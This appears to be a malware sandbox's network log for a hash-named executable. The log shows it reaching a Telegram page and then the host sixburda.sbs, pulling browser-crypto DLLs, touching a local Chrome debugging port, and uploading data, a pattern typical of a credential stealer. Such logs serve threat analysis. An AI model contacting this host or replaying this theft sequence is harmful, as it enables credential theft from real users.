Content-Type: multipart/form-data; boundary=----EGCFHDAKECFIDGDGDBKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9NEnAKH3buUfEQ7uQnuYQLFYJHRqLv%2F3itA0Vgm%2BryXHMjXRLG5OscQMLrJvalrkyIn3rMQvO5U0qu21490JQpPWExmaKsjv0tv6F21dLK%2BSTnNXc59W2P2wgLxkN%2FU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db9314e7d7693db-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20824&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=66643&cwnd=250&unsent_bytes=0&cid=90c40b3ee42e6f94&ts=414&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JeJwmFLxm0i1fSAMDIltJ4QL%2ByzJu%2BPSCBNRjzkJQyBd%2FgFcmH3DVMvfx8BjjfXR4Ad3e8p9%2F%2BujEjNu0lCivqmHB4khp06v2IoeoRtgm8ABtNkpL37BfpsT6%2FZSNIQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db931515ec14142-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=23116&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=65384&cwnd=250&unsent_bytes=0&cid=b9133ecb37e449fc&ts=441&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKmKiS7FmaGWb87hb5Y72jmOFojZe0%2FOVZarlVI7P5HDcIiYhkTie%2F0y5a%2BmBQtulRCn8jILM%2B0c0MkmaBZLVPkSppLZFtUioKZBnhVJju%2BuJtvZMz9pik5fvWOGYio%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db93154be6279c0-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20477&sent=4&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1231&delivery_rate=62809&cwnd=250&unsent_bytes=0&cid=f8b88d4588d3570a&ts=443&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 107941
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:38:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9lgex8nM3NK9%2BnEd9w%2Bim%2Fl76G0uSwK%2B5uHdiFqGscDfsy5knBye7rpd2jfbf%2Fjc3Mjfrsk5Xfz6tTT8EW5SbV38CAeMn029vq%2BMFY6fAnRg%2FJSf9S6dfYfdWfJs6Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db9315849e1657c-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=22863&sent=38&recv=87&lost=0&retrans=0&sent_bytes=115&recv_bytes=108917&delivery_rate=65679&cwnd=242&unsent_bytes=0&cid=98c12f8332bfbdc8&ts=1043&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:38:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2FQlhmnxpoxtf%2FpoEHlr1%2FCIUZI54J%2FyGgSmKv%2FVIzSJkHBUNceP6pYpjhEr3WKWISVFXOYr5hbeh%2BC0gF0znHkKC7N45O3jj0%2BuuFaIWrfT2rtZzD4aZUqin%2F87kek%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db9315f093271a5-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20861&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=66807&cwnd=250&unsent_bytes=0&cid=3fcb4f78b0477ee9&ts=444&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:38:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3x5ZycKKk5n7M4R9%2F4tiEo5hspTOaLLxWbj32gQsL%2BNFigaSc8HfwaCScoHE5RVpQHcTiqTI%2BAIfisn6Tu6jvoW6J%2FvIgKq5G1zk0raM3QYNnBcVkjS70QLMVcjVDQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db931621b47bd98-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20496&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=65915&cwnd=250&unsent_bytes=0&cid=4e0e5aa2432f0bd4&ts=422&x=0"
DNS

56.163.245.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.163.245.4.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

67.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.209.201.84.in-addr.arpa

IN PTR

Response
DNS

57.169.31.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.169.31.20.in-addr.arpa

IN PTR

Response
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 737521
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8F835E8276C2400895207465D3070433 Ref B: LON601060101060 Ref C: 2024-11-01T04:39:16Z
date: Fri, 01 Nov 2024 04:39:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301513_17N4ZKW2Z4OBSOG2N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239317301513_17N4ZKW2Z4OBSOG2N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 707128
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2416DAE0DA7F4BA3B0BAB74E76941383 Ref B: LON601060101060 Ref C: 2024-11-01T04:39:16Z
date: Fri, 01 Nov 2024 04:39:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 680644
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 336FAB3D2771424AB6F42265C09AE5BA Ref B: LON601060101060 Ref C: 2024-11-01T04:39:16Z
date: Fri, 01 Nov 2024 04:39:16 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301080_1XM3OKWL8S1Z1BR44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239317301080_1XM3OKWL8S1Z1BR44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 563032
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D946E51165A5496C8E7C9D1C92864B93 Ref B: LON601060101060 Ref C: 2024-11-01T04:39:16Z
date: Fri, 01 Nov 2024 04:39:16 GMT

150.171.27.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

tls, http2

2.0kB
9.4kB
22
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f70cacacd04d4166b70b5b285b306d33&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

HTTP Response

204
149.154.167.99:443

https://t.me/asg7rd

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.5kB
19.4kB
24
20

HTTP Request

GET https://t.me/asg7rd

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.1kB
4.5kB
12
9

HTTP Request

GET https://sixburda.sbs/

HTTP Response

200
142.250.187.227:80

http://c.pki.goog/r/r4.crl

http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

556 B
3.8kB
7
5

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.5kB
1.3kB
10
7

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.6kB
2.8kB
11
8

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.8kB
7.2kB
15
12

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.6kB
1.3kB
10
7

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

6.3kB
1.3kB
14
8

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/sqlo.dll

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

100.8kB
2.5MB
1926
1921

HTTP Request

GET https://sixburda.sbs/sqlo.dll

HTTP Response

200
142.250.180.4:443

www.google.com

tls

chrome.exe

907 B
4.6kB
7
7
216.58.213.10:443

ogads-pa.googleapis.com

tls, http2

chrome.exe

979 B
5.9kB
8
7
216.58.204.78:443

clients2.google.com

tls, http2

chrome.exe

975 B
8.0kB
8
8
127.0.0.1:9223

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

2.4kB
1.3kB
11
9

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
127.0.0.1:9223

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.7kB
1.2kB
10
7

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.7kB
1.2kB
10
7

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/freebl3.dll

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

29.0kB
715.2kB
616
614

HTTP Request

GET https://sixburda.sbs/freebl3.dll

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/mozglue.dll

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

25.9kB
634.0kB
533
530

HTTP Request

GET https://sixburda.sbs/mozglue.dll

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/msvcp140.dll

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

20.2kB
471.1kB
424
421

HTTP Request

GET https://sixburda.sbs/msvcp140.dll

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/softokn3.dll

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

13.1kB
272.4kB
269
266

HTTP Request

GET https://sixburda.sbs/softokn3.dll

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/vcruntime140.dll

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

5.5kB
87.5kB
104
101

HTTP Request

GET https://sixburda.sbs/vcruntime140.dll

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/nss3.dll

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

99.6kB
2.2MB
1675
1671

HTTP Request

GET https://sixburda.sbs/nss3.dll

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

2.3kB
1.2kB
11
7

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.7kB
3.6kB
13
10

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.6kB
2.8kB
11
8

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.7kB
1.3kB
10
8

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

112.6kB
2.7kB
91
42

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.5kB
1.2kB
9
6

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
104.21.74.185:443

https://sixburda.sbs/

tls, http

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

1.5kB
1.1kB
8
5

HTTP Request

POST https://sixburda.sbs/

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
12
150.171.27.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301080_1XM3OKWL8S1Z1BR44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

tls, http2

97.4kB
2.8MB
2028
2022

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301513_17N4ZKW2Z4OBSOG2N&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388226_1MEO3672GYCIY8OR6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301080_1XM3OKWL8S1Z1BR44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
12

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
148 B
1
1

DNS Request

g.bing.com

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

136.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

136.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

10.27.171.150.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.27.171.150.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

t.me

dns

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

99.167.154.149.in-addr.arpa

dns

73 B
166 B
1
1

DNS Request

99.167.154.149.in-addr.arpa
8.8.8.8:53

sixburda.sbs

dns

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

58 B
90 B
1
1

DNS Request

sixburda.sbs

DNS Response

104.21.74.185

172.67.205.154
8.8.8.8:53

c.pki.goog

dns

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.187.227
8.8.8.8:53

41.249.124.192.in-addr.arpa

dns

73 B
113 B
1
1

DNS Request

41.249.124.192.in-addr.arpa
8.8.8.8:53

185.74.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

185.74.21.104.in-addr.arpa
8.8.8.8:53

227.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

227.187.250.142.in-addr.arpa
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.180.4
142.250.180.4:443

www.google.com

https

chrome.exe

3.9kB
47.6kB
35
50
8.8.8.8:53

ogads-pa.googleapis.com

dns

chrome.exe

69 B
277 B
1
1

DNS Request

ogads-pa.googleapis.com

DNS Response

216.58.213.10

216.58.201.106

142.250.187.234

142.250.200.42

142.250.187.202

216.58.212.234

142.250.200.10

142.250.179.234

172.217.169.74

142.250.180.10

172.217.16.234

216.58.204.74

142.250.178.10
8.8.8.8:53

apis.google.com

dns

chrome.exe

61 B
98 B
1
1

DNS Request

apis.google.com

DNS Response

172.217.16.238
172.217.16.238:443

apis.google.com

https

chrome.exe

6.6kB
49.6kB
31
47
216.58.213.10:443

ogads-pa.googleapis.com

https

chrome.exe

4.0kB
7.3kB
12
14
8.8.8.8:53

3.180.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.180.250.142.in-addr.arpa
8.8.8.8:53

234.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

234.179.250.142.in-addr.arpa
8.8.8.8:53

238.16.217.172.in-addr.arpa

dns

73 B
142 B
1
1

DNS Request

238.16.217.172.in-addr.arpa
8.8.8.8:53

10.213.58.216.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

10.213.58.216.in-addr.arpa
8.8.8.8:53

play.google.com

dns

chrome.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

172.217.16.238
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

clients2.google.com

dns

chrome.exe

65 B
